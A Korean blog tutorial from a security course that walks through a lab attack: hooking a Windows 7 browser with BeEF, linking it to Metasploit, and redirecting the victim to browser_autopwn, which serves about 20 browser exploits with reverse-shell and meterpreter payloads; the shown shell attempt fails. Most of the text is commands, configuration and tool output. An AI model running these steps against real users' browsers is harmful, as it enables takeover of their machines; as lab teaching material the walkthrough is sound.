보안/Metasploit 2016.06.08 13:58

Metasploit - 18. BeEF & MSF (Web 브라우저 해킹)

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.

 

 

[실습 시스템] Kali Linux, Firewall, Window7

 

 

 - 'BeEF' 툴과 Metasploit을 이용하여 브라우저 해킹 및 원격 쉘을 획득하도록 테스트한다.

 

 

 

[실습 단계]

 

웹-페이지 생성 -> BeEF & Mestsploit 연동 및 플러그인 -> 리다이렉트 페이지 구성 및 악성 코드 유입 -> 접속

 

 

 

Ex1) 테스트 웹-페이지 생성 및 아파치 재시작

 

root@kali:~# cd /var/www/html
root@kali:/var/www/html# ls
index.html


root@kali:/var/www/html#
root@kali:/var/www/html# vi index.html
root@kali:/var/www/html#
root@kali:/var/www/html# cd

root@kali:~#

root@kali:~# service apache2 restart


 

 

 

Ex2) BeEF 설정 파일 변경 및 msfconsole 플러그인 실시

 

 - Metaploit과 연동하기 위해서 BeEF 설정 파일을 변경한다.

 

@ Kali Linux

 

(터미널1)

root@kali:~# vi /usr/share/beef-xss/config.yaml

 

~ 중간 생략 ~

 

   # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
            key: "beef_key.pem"
            cert: "beef_cert.pem"
        metasploit:
            enable: false <- true 변경


~ 중간 생략 ~

 

: wq! 

 

 

 

 - msgrpc 플러그인 정보를 확인한다.

 

root@kali:~# vi /usr/share/beef-xss/extensions/metasploit/config.yaml

 

#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Enable MSF by changing extension:metasploit:enable to true
# Then set msf_callback_host to be the public IP of your MSF server
#
# Ensure you load the xmlrpc interface in Metasploit
# msf > load msgrpc ServerHost=IP Pass=abc123
# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
# Also always use the IP of your machine where MSF is listening.
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "127.0.0.1"
            port: 55552
            user: "msf"
            pass: "abc123"
            uri: '/api'
            # if you need "ssl: true" make sure you start msfrpcd with "SSL=y", like:
            # load msgrpc ServerHost=IP Pass=abc123 SSL=y
            ssl: false
            ssl_version: 'TLSv1'
            ssl_verify: true
            callback_host: "127.0.0.1"
            autopwn_url: "autopwn"
            auto_msfrpcd: false
            auto_msfrpcd_timeout: 120
            msf_path: [
 ~ 중간 생략 ~

 

: q!

 

 

 

 - msfconsole을 실행하여 msgrpc 플러그인을 실시한다.

 

@ Kali Linux

 

root@kali:~# ls /usr/share/metasploit-framework/plugins/msgrpc.rb
/usr/share/metasploit-framework/plugins/msgrpc.rb

 

root@kali:~# msfconsole -q
msf >
msf > load msgrpc Pass=abc123
[*] MSGRPC Service:  127.0.0.1:55552
[*] MSGRPC Username: msf
[*] MSGRPC Password: abc123
[*] Successfully loaded plugin: msgrpc
msf >

 

 

 

 

Ex3) BeEF 실행

 

 - BeEF을 실행하여 HooK URL과 UI URL을 확인한다.

 

@ Kali Linux

 

(터미널2)

root@kali:~# cd /usr/share/beef-xss/
root@kali:/usr/share/beef-xss# ls
Gemfile       beef           beef_key.pem  core  extensions
Gemfile.lock  beef_cert.pem  config.yaml   db    modules



root@kali:/usr/share/beef-xss# ./beef -x
[14:37:07][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].
[14:37:07][*] Browser Exploitation Framework (BeEF) 0.4.6.1-alpha
[14:37:07]    |   Twit: @beefproject
[14:37:07]    |   Site: http://beefproject.com
[14:37:07]    |   Blog: http://blog.beefproject.com
[14:37:07]    |_  Wiki: https://github.com/beefproject/beef/wiki
[14:37:07][*] Project Creator: Wade Alcorn (@WadeAlcorn)
[14:37:07][*] Successful connection with Metasploit.
[14:37:10][*] Loaded 292 Metasploit exploits.
[14:37:10][*] Resetting the database for BeEF.
[14:37:10][*] BeEF is loading. Wait a few seconds...
[14:37:19][*] 13 extensions enabled.
[14:37:19][*] 532 modules enabled.
[14:37:19][*] 3 network interfaces were detected.
[14:37:19][+] running on network interface: 127.0.0.1
[14:37:19]    |   Hook URL: http://127.0.0.1:3000/hook.js
[14:37:19]    |_  UI URL:   http://127.0.0.1:3000/ui/panel
[14:37:19][+] running on network interface: 192.168.1.50
[14:37:19]    |   Hook URL: http://192.168.1.50:3000/hook.js
[14:37:19]    |_  UI URL:   http://192.168.1.50:3000/ui/panel
[14:37:19][+] running on network interface: 192.168.20.50
[14:37:19]    |   Hook URL: http://192.168.20.50:3000/hook.js
[14:37:19]    |_  UI URL:   http://192.168.20.50:3000/ui/panel
[14:37:19][*] RESTful API key: 09f11aee7ba6b8a01fecd44cda371bb9be734178
[14:37:19][*] HTTP Proxy: http://127.0.0.1:6789
[14:37:19][*] DNS Server: 127.0.0.1:5300 (udp)
[14:37:19]    |   Upstream Server: 8.8.8.8:53 (udp)
[14:37:19]    |_  Upstream Server: 8.8.8.8:53 (tcp)
[14:37:19][*] BeEF server started (press control+c to stop)


 

 - BeEF가 이미 실행되었으니, 파이어폭스를 이용하여 BeEF 웹-페이지를 접속한다. (beef/beef)


(터미널3)

root@kali:~# firefox http://127.0.0.1:3000/ui/panel &
[1] 3053

 

 

 

 

Ex4) Window7에서 'http://192.168.20.50' 접속 실시

 

 - Window7에서 크롬 브라우저를 이용하여 'http://192.168.20.50'으로 접속을 실시한다.

 

 

 

 

 

 

 

Ex5) BeEF 웹-페이지 후킹 결과 확인

 

 - BeEF에 Window7이 후킹되었는지 확인한다.

 

 

 

 

 

(터미널2)

[14:54:55][!] [Browser Details] Invalid browser name returned from the hook browser's initial connection.
[14:54:55][*] New Hooked Browser [id:1, ip:192.168.20.202, type:UNKNOWN-UNKNOWN, os:Windows 7], hooked domain [192.168.20.50:80]

 

 

 

 - BeEF로 로딩된 Metasploit 모듈을 확인한다.

 

 

'192.168.20.202' 클릭 -> Commands -> Metaploit 모듈 확인

 

 

 

 

 

Ex6) msfconsole 설정

 

 - 'browser_autopwn' 공격(브라우저를 이용한 Reverse TCP 공격)을 이용하여 제어권을 획득하도록 한다.

 

(터미널1)

msf > search autopwn

Matching Modules
================

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/server/browser_autopwn                    normal  HTTP Client Automatic Exploiter
   auxiliary/server/browser_autopwn2  2015-07-05       normal  HTTP Client Automatic Exploiter 2 (Browser Autopwn)

 

 

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) >
smsf auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080         yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                 no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


 

msf auxiliary(browser_autopwn) > set LHOST 192.168.20.50
LHOST => 192.168.20.50


msf auxiliary(browser_autopwn) > set SRVHOST 192.168.20.50
SRVHOST => 192.168.20.50


msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /


msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Setup

 

[*] Starting exploit modules on host 192.168.20.50...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/DvYSfcQe
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/BFKrz
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/oLImqQCiwX
[*] Server started.
7~[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/IPzOblzFmvNUs
[*] Server started.
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/eZPzGOmcehw
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/fVOVKNVB
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/oOgkj
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/SylveaoPPa
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/NlVHFCqH
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/lOIVOnA
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.20.50:8080/erXkpBtoOm
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/snmfDS
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/LexolDUFeWQBB
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/GqHTwwRxD
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/DWSpC
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/hHvY
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/pHIpzR
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/hXbtRRwrz
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/iJYGUiD
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.20.50:8080/fTHiphgZntD
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.20.50:3333
[*] Starting the payload handler...
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.20.50:6666
[*] Started reverse TCP handler on 192.168.20.50:7777
[*] Starting the payload handler...
[*] Starting the payload handler...

 

[*] --- Done, found 20 exploit modules

 

[*] Using URL: http://192.168.20.50:8080/
[*] Server started.

 

 

 

 

Ex7) BeEF 설정

 

 - BeEF 웹-페이지에서 다음과 같은 순번대로 작업을 진행하여 구글 사이트로 리다이렉트를 실시한다.

 

@ Kali Linux

 

 

'192.168.20.202' 클릭 -> Commands -> Browser -> Hooked Domain -> Redirect Browser -> http://192.168.20.50:8080 -> Execute 클릭

 

 


 

Ex8) Window7에서 리다이렉트된 웹-페이지 결과 확인

 

 - Window7에서 리다이렉트된 웹-페이지로 변경됬는지 결과 확인한다.

 

 

Ex9) 쉘 획득 확인

 

 - 현재 크롬 브라우저에서는 테스트가 실패된다. (파이어폭스, 인터넷 익스플로러도 실패)

 

(터미널1)

[*] 192.168.20.202   browser_autopwn - Handling '/'
[*] 192.168.20.202   browser_autopwn - Handling '/?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDprbzp4ODY6Q2hyb21lOjUxLjAuMjcwNC44NDo%3d'
[*] 192.168.20.202   browser_autopwn - JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:ko:x86:Chrome:51.0.2704.84:
[*] 192.168.20.202   browser_autopwn - Reporting: {"os.product"=>"Windows 7", "os.language"=>"ko", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] 192.168.20.202   browser_autopwn - Responding with 6 exploits
[*] 192.168.20.202   browser_autopwn - Handling '/favicon.ico'
[*] 192.168.20.202   browser_autopwn - 404ing /favicon.ico
[*] 192.168.20.202   browser_autopwn - Handling '/'
[*] 192.168.20.202   browser_autopwn - Handling '/?sessid=V2luZG93cyA3OnVuZGVmaW5lZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDprbzp4ODY6Q2hyb21lOjUxLjAuMjcwNC44NDo%3d'
[*] 192.168.20.202   browser_autopwn - JavaScript Report: Windows 7:undefined:undefined:undefined:undefined:ko:x86:Chrome:51.0.2704.84:
[*] 192.168.20.202   browser_autopwn - Reporting: {"os.product"=>"Windows 7", "os.language"=>"ko", "os.arch"=>"x86", "os.certainty"=>"0.7"}
[*] 192.168.20.202   browser_autopwn - Responding with 6 exploits

 

msf auxiliary(browser_autopwn) > exit


root@kali:~#

 

 

(터미널2)

(ctrl+c)
root@kali:~#

 

 

(터미널3)

(ctrl+c)
root@kali:~#

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)


Metasploit - 제1장 메타스플로잇 (metaspliot)   

 

Posted by 김정우 강사(카카오톡 : kim10322)


Q